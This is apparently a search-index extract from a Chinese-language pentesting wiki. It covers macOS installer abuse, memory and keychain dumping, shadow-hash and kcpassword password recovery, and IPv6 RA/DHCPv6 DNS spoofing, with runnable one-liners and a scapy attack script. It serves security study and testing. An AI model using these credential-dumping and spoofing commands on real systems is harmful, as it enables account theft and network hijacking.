Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » 探索 Bundles","id":"2243","title":"探索 Bundles"},"2244":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » macOS 安装程序滥用","id":"2244","title":"macOS 安装程序滥用"},"2245":{"body":"macOS 安装包 (也称为 .pkg 文件)是一种由 macOS 用于 分发软件 的文件格式。这些文件就像一个 包含软件所需的一切的盒子 ,以便正确安装和运行。 包文件本身是一个存档,包含一个 将在目标计算机上安装的文件和目录的层次结构 。它还可以包括 脚本 ,在安装前后执行任务,例如设置配置文件或清理旧版本的软件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » Pkg 基本信息","id":"2245","title":"Pkg 基本信息"},"2246":{"body":"Distribution (xml) : 自定义(标题,欢迎文本……)和脚本/安装检查 PackageInfo (xml) : 信息,安装要求,安装位置,运行脚本的路径 Bill of materials (bom) : 要安装、更新或删除的文件列表及文件权限 Payload (CPIO archive gzip compresses) : 从 PackageInfo 中在 install-location 安装的文件 Scripts (CPIO archive gzip compressed) : 安装前和安装后的脚本以及提取到临时目录以供执行的更多资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 层次结构","id":"2246","title":"层次结构"},"2247":{"body":"bash # Tool to directly get the files inside a package\\npkgutil —expand \\"/path/to/package.pkg\\" \\"/path/to/out/dir\\" # Get the files ina. more manual way\\nmkdir -p \\"/path/to/out/dir\\"\\ncd \\"/path/to/out/dir\\"\\nxar -xf \\"/path/to/package.pkg\\" # Decompress also the CPIO gzip compressed ones\\ncat Scripts | gzip -dc | cpio -i\\ncpio -i < Scripts 为了在不手动解压缩安装程序的情况下可视化其内容,您还可以使用免费的工具 Suspicious Package 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 解压缩","id":"2247","title":"解压缩"},"2248":{"body":"DMG 文件,或称 Apple 磁盘映像,是苹果的 macOS 用于磁盘映像的文件格式。DMG 文件本质上是一个 可挂载的磁盘映像 (它包含自己的文件系统),其中包含通常被压缩且有时被加密的原始块数据。当您打开 DMG 文件时,macOS 将其挂载为物理磁盘 ,允许您访问其内容。 caution 请注意, .dmg 安装程序支持 如此多的格式 ,以至于在过去,一些包含漏洞的格式被滥用以获得 内核代码执行 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » DMG 基本信息","id":"2248","title":"DMG 基本信息"},"2249":{"body":"DMG 文件的层级结构可能会根据内容而有所不同。然而,对于应用程序 DMG,它通常遵循以下结构: 顶层:这是磁盘映像的根。它通常包含应用程序,并可能包含指向应用程序文件夹的链接。 应用程序 (.app):这就是实际的应用程序。在 macOS 中,应用程序通常是一个包含许多单独文件和文件夹的包,这些文件和文件夹构成了该应用程序。 应用程序链接:这是指向 macOS 中应用程序文件夹的快捷方式。这样做的目的是方便您安装应用程序。您可以将 .app 文件拖到此快捷方式上以安装该应用程序。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 层级结构","id":"2249","title":"层级结构"},"225":{"body":"RFC 8106 允许在 RA 中添加 递归 DNS 服务器(RDNSS) 选项。现代操作系统(Win 10 ≥1709、Win 11、macOS Big Sur、Linux systemd-resolved 等)会自动信任它: python #!/usr/bin/env python3\\nfrom scapy.all import *\\nimport argparse p = argparse.ArgumentParser()\\nP = p.add_argument\\nP(\'-i\',\'--interface\',required=True)\\nP(\'--llip\',required=True)\\nP(\'--dns\',required=True,help=\'Fake DNS IPv6\')\\nP(\'--lifetime\',type=int,default=600)\\nP(\'--interval\',type=int,default=5)\\nargs = p.parse_args() ra = (IPv6(src=args.llip,dst=\'ff02::1\',hlim=255)/\\nICMPv6ND_RA(routerlifetime=0)/\\nICMPv6NDOptRDNSS(dns=[args.dns],lifetime=args.lifetime)) send(ra,iface=args.interface,loop=1,inter=args.interval) 客户将 预先添加 您的DNS到其解析器列表中,直到给定的生存时间结束,这将授予完全的DNS劫持,直到值过期或您发送lifetime=0还原。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 通过 RA 进行 RDNSS(DNS)欺骗","id":"225","title":"通过 RA 进行 RDNSS(DNS)欺骗"},"2250":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 通过 pkg 滥用进行特权提升","id":"2250","title":"通过 pkg 滥用进行特权提升"},"2251":{"body":"如果预安装或后安装脚本例如从 /var/tmp/Installerutil 执行,攻击者可以控制该脚本,从而在每次执行时提升特权。或者另一个类似的例子: https://www.youtube.com/watch?v=kCXhIYtODBg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 从公共目录执行","id":"2251","title":"从公共目录执行"},"2252":{"body":"这是一个 公共函数 ,多个安装程序和更新程序将调用它以 以 root 身份执行某些操作 。此函数接受要 执行 的 文件 的 路径 作为参数,然而,如果攻击者能够 修改 此文件,他将能够 滥用 其以 root 身份执行以 提升特权 。 bash # Breakpoint in the function to check wich file is loaded\\n(lldb) b AuthorizationExecuteWithPrivileges\\n# You could also check FS events to find this missconfig For more info check this talk: https://www.youtube.com/watch?v=lTOItyjTTkw","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » AuthorizationExecuteWithPrivileges","id":"2252","title":"AuthorizationExecuteWithPrivileges"},"2253":{"body":"如果安装程序写入 /tmp/fixedname/bla/bla,可以在 /tmp/fixedname 上 创建一个挂载 ,并且没有所有者,这样你就可以 在安装过程中修改任何文件 来滥用安装过程。 一个例子是 CVE-2021-26089 ,它成功地 覆盖了一个定期脚本 以获得 root 权限。有关更多信息,请查看这个演讲: OBTS v4.0: \\"Mount(ain) of Bugs\\" - Csaba Fitzl","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 执行通过挂载","id":"2253","title":"执行通过挂载"},"2254":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » pkg 作为恶意软件","id":"2254","title":"pkg 作为恶意软件"},"2255":{"body":"可以仅生成一个 .pkg 文件,里面包含 预安装和后安装脚本 ,而没有任何真正的载荷,除了脚本中的恶意软件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 空载荷","id":"2255","title":"空载荷"},"2256":{"body":"可以在包的 分发 xml 文件中添加 \\n\\n\\n\\n\\n\\n\\n\\n\\n#myapp.pkg\\n\\nEOF # Buil final\\nproductbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 后门安装程序","id":"2257","title":"后门安装程序"},"2258":{"body":"DEF CON 27 - 解包 Pkgs 深入了解 Macos 安装包及常见安全漏洞 OBTS v4.0: \\"macOS 安装程序的奇妙世界\\" - Tony Lambert DEF CON 27 - 解包 Pkgs 深入了解 MacOS 安装包 https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 参考文献","id":"2258","title":"参考文献"},"2259":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » macOS 内存转储","id":"2259","title":"macOS 内存转储"},"226":{"body":"Windows网络通常依赖于 无状态DHCPv6 进行DNS,而不是SLAAC。 mitm6 自动回复Solicit消息,使用 广告 → 回复 流程,将 您的链路本地地址分配为DNS,持续300秒 。这解锁了: NTLM中继攻击(WPAD + DNS劫持) 拦截内部名称解析而不触及路由器 典型用法: bash sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning","breadcrumbs":"Pentesting Network » Pentesting IPv6 » DHCPv6 DNS欺骗 (mitm6)","id":"226","title":"DHCPv6 DNS欺骗 (mitm6)"},"2260":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 内存伪影","id":"2260","title":"内存伪影"},"2261":{"body":"交换文件,如 /private/var/vm/swapfile0,在 物理内存满时充当缓存 。当物理内存没有更多空间时,其数据会被转移到交换文件中,然后根据需要再带回物理内存。可能会存在多个交换文件,名称如 swapfile0、swapfile1 等。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 交换文件","id":"2261","title":"交换文件"},"2262":{"body":"位于 /private/var/vm/sleepimage 的文件在 休眠模式 下至关重要。 当 OS X 进入休眠时,内存中的数据会存储在此文件中 。唤醒计算机时,系统会从该文件中检索内存数据,使用户能够继续之前的工作。 值得注意的是,在现代 MacOS 系统上,此文件通常出于安全原因被加密,导致恢复变得困难。 要检查 sleepimage 是否启用加密,可以运行命令 sysctl vm.swapusage。这将显示文件是否被加密。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 休眠映像","id":"2262","title":"休眠映像"},"2263":{"body":"另一个与内存相关的重要文件是 内存压力日志 。这些日志位于 /var/log 中,包含有关系统内存使用情况和压力事件的详细信息。它们对于诊断与内存相关的问题或理解系统如何随时间管理内存特别有用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 内存压力日志","id":"2263","title":"内存压力日志"},"2264":{"body":"为了在 MacOS 机器上转储内存,可以使用 osxpmem 。 注意 :以下说明仅适用于具有 Intel 架构的 Mac。此工具现已归档,最后一次发布是在 2017 年。根据以下说明下载的二进制文件针对 Intel 芯片,因为在 2017 年时 Apple Silicon 尚未出现。可能可以为 arm64 架构编译二进制文件,但您需要自己尝试。 bash #Dump raw format\\nsudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem #Dump aff4 format\\nsudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4 如果您发现此错误:osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8) 您可以通过以下方式修复它: bash sudo cp -r osxpmem.app/MacPmem.kext \\"/tmp/\\"\\nsudo kextutil \\"/tmp/MacPmem.kext\\"\\n#Allow the kext in \\"Security & Privacy --> General\\"\\nsudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem 其他错误 可能通过 允许加载kext 在“安全性与隐私 --> 常规”中修复,只需 允许 它。 您还可以使用此 单行命令 下载应用程序,加载kext并转储内存: bash sudo su\\ncd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 使用 osxpmem 转储内存","id":"2264","title":"使用 osxpmem 转储内存"},"2265":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » macOS 敏感位置与有趣的守护进程","id":"2265","title":"macOS 敏感位置与有趣的守护进程"},"2266":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 密码","id":"2266","title":"密码"},"2267":{"body":"隐藏密码与用户的配置一起存储在位于 /var/db/dslocal/nodes/Default/users/ 的 plist 文件中。 以下单行命令可用于转储 所有用户的信息 (包括哈希信息): bash for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r \\"$l\\" ];then echo \\"$l\\"; defaults read \\"$l\\"; fi; done 像这样的脚本 或 这个 可以用来将哈希转换为 hashcat 格式 。 一个替代的一行命令将以 hashcat 格式 -m 7100(macOS PBKDF2-SHA512)转储所有非服务账户的凭据: bash sudo bash -c \'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex \\"[^_]*\\"); do plutil -extract name.0 raw $i | awk \\"{printf \\\\$0\\\\\\":\\\\$ml\\\\$\\\\\\"}\\"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk \\"{printf \\\\\\"$\\\\\\"\\\\$0}\\"; fi; done; echo \\"\\"; done\' 另一种获取用户 ShadowHashData 的方法是使用 dscl: sudo dscl . -read /Users/`whoami` ShadowHashData","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 隐藏密码","id":"2267","title":"隐藏密码"},"2268":{"body":"此文件 仅在 系统以 单用户模式 运行时使用(因此不太频繁)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » /etc/master.passwd","id":"2268","title":"/etc/master.passwd"},"2269":{"body":"请注意,当使用 security 二进制文件 解密并转储密码 时,会有几个提示要求用户允许此操作。 bash #security\\nsecurity dump-trust-settings [-s] [-d] #List certificates\\nsecurity list-keychains #List keychain dbs\\nsecurity list-smartcards #List smartcards\\nsecurity dump-keychain | grep -A 5 \\"keychain\\" | grep -v \\"version\\" #List keychains entries\\nsecurity dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Keychain Dump","id":"2269","title":"Keychain Dump"},"227":{"body":"在管理交换机上使用 RA Guard / DHCPv6 Guard / ND Inspection 。 端口 ACL 仅允许合法路由器的 MAC 发送 RAs。 监控 不稳定的高频率 RAs 或突然的 RDNSS 变化 。 在端点禁用 IPv6 是一种临时解决方法,通常会破坏现代服务并隐藏盲点 – 更倾向于使用 L2 过滤。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 防御","id":"227","title":"防御"},"2270":{"body":"caution 根据这个评论 juuso/keychaindump#10 (comment) ,这些工具在 Big Sur 中似乎不再有效。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Keychaindump","id":"2270","title":"Keychaindump"},"2271":{"body":"一个名为 keychaindump 的工具被开发出来以从 macOS 钥匙串中提取密码,但在像 Big Sur 这样的较新 macOS 版本上面临限制,如 讨论 所示。使用 keychaindump 需要攻击者获得访问权限并提升到 root 权限。该工具利用了钥匙串在用户登录时默认解锁的事实,以方便应用程序访问,而无需用户重复输入密码。然而,如果用户选择在每次使用后锁定他们的钥匙串, keychaindump 将变得无效。 Keychaindump 通过针对一个特定的进程 securityd 来操作,Apple 将其描述为一个用于授权和加密操作的守护进程,对于访问钥匙串至关重要。提取过程涉及识别一个从用户登录密码派生的 Master Key 。这个密钥对于读取钥匙串文件是必不可少的。为了找到 Master Key , keychaindump 使用 vmmap 命令扫描 securityd 的内存堆,寻找标记为 MALLOC_TINY 的区域中的潜在密钥。以下命令用于检查这些内存位置: bash sudo vmmap | grep MALLOC_TINY 在识别潜在的主密钥后, keychaindump 在堆中搜索特定模式 (0x0000000000000018),这表明一个主密钥的候选者。进一步的步骤,包括去混淆,都是利用这个密钥所必需的,正如 keychaindump 的源代码中所概述的。专注于这一领域的分析师应注意,解密钥匙串的关键数据存储在 securityd 进程的内存中。运行 keychaindump 的示例命令是: bash sudo ./keychaindump","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Keychaindump 概述","id":"2271","title":"Keychaindump 概述"},"2272":{"body":"Chainbreaker 可用于以法医可靠的方式从 OSX 密钥链中提取以下类型的信息: 哈希密钥链密码,适合使用 hashcat 或 John the Ripper 破解 互联网密码 通用密码 私钥 公钥 X509 证书 安全笔记 Appleshare 密码 给定密钥链解锁密码、使用 volafox 或 volatility 获得的主密钥,或如 SystemKey 的解锁文件,Chainbreaker 还将提供明文密码。 如果没有这些解锁密钥链的方法,Chainbreaker 将显示所有其他可用信息。 Dump keychain keys bash #Dump all keys of the keychain (without the passwords)\\npython2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain 使用 SystemKey 转储钥匙串密钥(带密码) bash # First, get the keychain decryption key\\n# To get this decryption key you need to be root and SIP must be disabled\\nhexdump -s 8 -n 24 -e \'1/1 \\"%.2x\\"\' /var/db/SystemKey && echo\\n## Use the previous key to decrypt the passwords\\npython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain 转储钥匙串密钥(带密码)破解哈希 bash # Get the keychain hash\\npython2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain\\n# Crack it with hashcat\\nhashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt\\n# Use the key to decrypt the passwords\\npython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain 通过内存转储转储钥匙串密钥(带密码) 按照这些步骤 执行 内存转储 bash #Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords\\n# Unformtunately volafox isn\'t working with the latest versions of MacOS\\npython vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump #Try to extract the passwords using the extracted keychain passwords\\npython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain 使用用户密码转储钥匙串密钥(包括密码) 如果您知道用户的密码,您可以使用它来 转储和解密属于该用户的钥匙串 。 bash #Prompt to ask for the password\\npython2.7 chainbreaker.py --dump-all --password-prompt /Users//Library/Keychains/login.keychain-db","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » chainbreaker","id":"2272","title":"chainbreaker"},"2273":{"body":"kcpassword 文件是一个保存 用户登录密码 的文件,但只有在系统所有者 启用自动登录 的情况下。 因此,用户将自动登录,而无需输入密码(这并不是很安全)。 密码存储在文件 /etc/kcpassword 中,使用密钥 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F 进行异或加密。 如果用户的密码长度超过密钥,密钥将被重复使用。 这使得密码相对容易恢复,例如使用像 这个 的脚本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » kcpassword","id":"2273","title":"kcpassword"},"2274":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Interesting Information in Databases","id":"2274","title":"Interesting Information in Databases"},"2275":{"body":"bash sqlite3 $HOME/Library/Messages/chat.db .tables\\nsqlite3 $HOME/Library/Messages/chat.db \'select * from message\'\\nsqlite3 $HOME/Library/Messages/chat.db \'select * from attachment\'\\nsqlite3 $HOME/Library/Messages/chat.db \'select * from deleted_messages\'\\nsqlite3 $HOME/Suggestions/snippets.db \'select * from emailSnippets\'","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Messages","id":"2275","title":"Messages"},"2276":{"body":"您可以在 $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/ 找到通知数据。 大多数有趣的信息将位于 blob 中。因此,您需要 提取 该内容并 转换 为 人类 可读 格式,或者使用 strings 。要访问它,您可以执行: bash cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/\\nstrings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 通知","id":"2276","title":"通知"},"2277":{"body":"用户的 notes 可以在 ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite 找到 bash sqlite3 ~/Library/Group\\\\ Containers/group.com.apple.notes/NoteStore.sqlite .tables #To dump it in a readable format:\\nfor i in $(sqlite3 ~/Library/Group\\\\ Containers/group.com.apple.notes/NoteStore.sqlite \\"select Z_PK from ZICNOTEDATA;\\"); do sqlite3 ~/Library/Group\\\\ Containers/group.com.apple.notes/NoteStore.sqlite \\"select writefile(\'body1.gz.z\', ZDATA) from ZICNOTEDATA where Z_PK = \'$i\';\\"; zcat body1.gz.Z ; done","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Notes","id":"2277","title":"Notes"},"2278":{"body":"在 macOS 应用中,偏好设置位于 $HOME/Library/Preferences ,而在 iOS 中则位于 /var/mobile/Containers/Data/Application//Library/Preferences。 在 macOS 中,可以使用 cli 工具 defaults 来 修改偏好设置文件 。 /usr/sbin/cfprefsd 声称 XPC 服务 com.apple.cfprefsd.daemon 和 com.apple.cfprefsd.agent,并可以被调用以执行诸如修改偏好设置等操作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Preferences","id":"2278","title":"Preferences"},"2279":{"body":"文件 /System/Library/OpenDirectory/permissions.plist 包含应用于节点属性的权限,并受到 SIP 保护。 该文件通过 UUID(而不是 uid)授予特定用户权限,以便他们能够访问特定的敏感信息,如 ShadowHashData、HeimdalSRPKey 和 KerberosKeys 等。 xml [...]\\ndsRecTypeStandard:Computers\\n\\ndsAttrTypeNative:ShadowHashData\\n\\n\\n\\nuuid\\nABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000\\npermissions\\n\\nreadattr\\nwriteattr\\n\\n\\n\\ndsAttrTypeNative:KerberosKeys\\n\\n\\n\\nuuid\\nABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000\\npermissions\\n\\nreadattr\\nwriteattr\\n\\n\\n\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » OpenDirectory permissions.plist","id":"2279","title":"OpenDirectory permissions.plist"},"228":{"body":"许多消费级路由器在所有接口上暴露管理守护进程(HTTP(S)、SSH/Telnet、TR-069 等)。在某些部署中,“客户/公共”SSID 被桥接到 WAN/核心,并且仅支持 IPv6。即使路由器的 IPv6 在每次启动时都会变化,您仍然可以通过 NDP/ICMPv6 可靠地学习它,然后从客户 SSID 直接连接到管理平面。 从连接到客户/公共 SSID 的客户端的典型工作流程: 通过 ICMPv6 路由器请求发现路由器,发送到所有路由器的多播 ff02::2 并捕获路由器广告 (RA): bash # Listen for Router Advertisements (ICMPv6 type 134)\\nsudo tcpdump -vvv -i \'icmp6 and ip6[40]==134\' # Provoke an RA by sending a Router Solicitation to ff02::2\\npython3 - <<\'PY\'\\nfrom scapy.all import *\\nsend(IPv6(dst=\'ff02::2\')/ICMPv6ND_RS(), iface=\'\')\\nPY RA揭示了路由器的链路本地地址,通常还有一个全局地址/前缀。如果只知道链路本地地址,请记住连接必须指定区域索引,例如ssh -6 admin@[fe80::1%wlan0]。 替代方案:如果可用,请使用ndisc6套件: bash # rdisc6 sends RS and prints RAs in a friendly way\\nrdisc6 从访客SSID访问通过IPv6暴露的服务: bash # SSH/Telnet example (replace with discovered address)\\nssh -6 admin@[2001:db8:abcd::1]\\n# Web UI over IPv6\\ncurl -g -6 -k \'http://[2001:db8:abcd::1]/\'\\n# Fast IPv6 service sweep\\nnmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1] 如果管理外壳通过包装器(例如,tcpdump)提供数据包捕获工具,请检查参数/文件名注入,以允许传递额外的 tcpdump 标志,如 -G/-W/-z,以实现后旋转命令执行。请参见: Wildcards Spare tricks 防御/注意事项: 不要将管理绑定到访客/公共桥接;在 SSID 桥接上应用 IPv6 防火墙。 在可行的情况下,对访客段进行 NDP/RS/RA 的速率限制和过滤。 对于必须可达的服务,强制实施身份验证/MFA 和强速率限制。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 客户/公共 SSID 上的 NDP 路由器发现和管理服务暴露","id":"228","title":"客户/公共 SSID 上的 NDP 路由器发现和管理服务暴露"},"2280":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 系统通知","id":"2280","title":"系统通知"},"2281":{"body":"主要的通知守护进程是 /usr/sbin/notifyd 。为了接收通知,客户端必须通过 com.apple.system.notification_center Mach 端口进行注册(使用 sudo lsmp -p 检查它们)。该守护进程可以通过文件 /etc/notify.conf 进行配置。 用于通知的名称是唯一的反向 DNS 表示法,当向其中一个名称发送通知时,已指明可以处理该通知的客户端将接收到它。 可以通过向 notifyd 进程发送 SIGUSR2 信号并读取生成的文件 /var/run/notifyd_.status 来转储当前状态(并查看所有名称): bash ps -ef | grep -i notifyd\\n0 376 1 0 15Mar24 ?? 27:40.97 /usr/sbin/notifyd sudo kill -USR2 376 cat /var/run/notifyd_376.status\\n[...]\\npid: 94379 memory 5 plain 0 port 0 file 0 signal 0 event 0 common 10\\nmemory: com.apple.system.timezone\\ncommon: com.apple.analyticsd.running\\ncommon: com.apple.CFPreferences._domainsChangedExternally\\ncommon: com.apple.security.octagon.joined-with-bottle\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Darwin 通知","id":"2281","title":"Darwin 通知"},"2282":{"body":"分布式通知中心 的主要二进制文件是**/usr/sbin/distnoted**,这是发送通知的另一种方式。它暴露了一些XPC服务,并执行一些检查以尝试验证客户端。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 分布式通知中心","id":"2282","title":"分布式通知中心"},"2283":{"body":"在这种情况下,应用程序可以注册 主题 。客户端将通过**apsd 联系苹果的服务器生成一个令牌。 然后,提供者也将生成一个令牌,并能够连接到苹果的服务器向客户端发送消息。这些消息将由 apsd**本地接收,并将通知转发给等待它的应用程序。 首选项位于/Library/Preferences/com.apple.apsd.plist。 在macOS中,消息的本地数据库位于/Library/Application\\\\ Support/ApplePushService/aps.db,在iOS中位于/var/mobile/Library/ApplePushService。它有3个表:incoming_messages、outgoing_messages和channel。 bash sudo sqlite3 /Library/Application\\\\ Support/ApplePushService/aps.db 也可以使用以下命令获取有关守护进程和连接的信息: bash /System/Library/PrivateFrameworks/ApplePushService.framework/apsctl status","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & 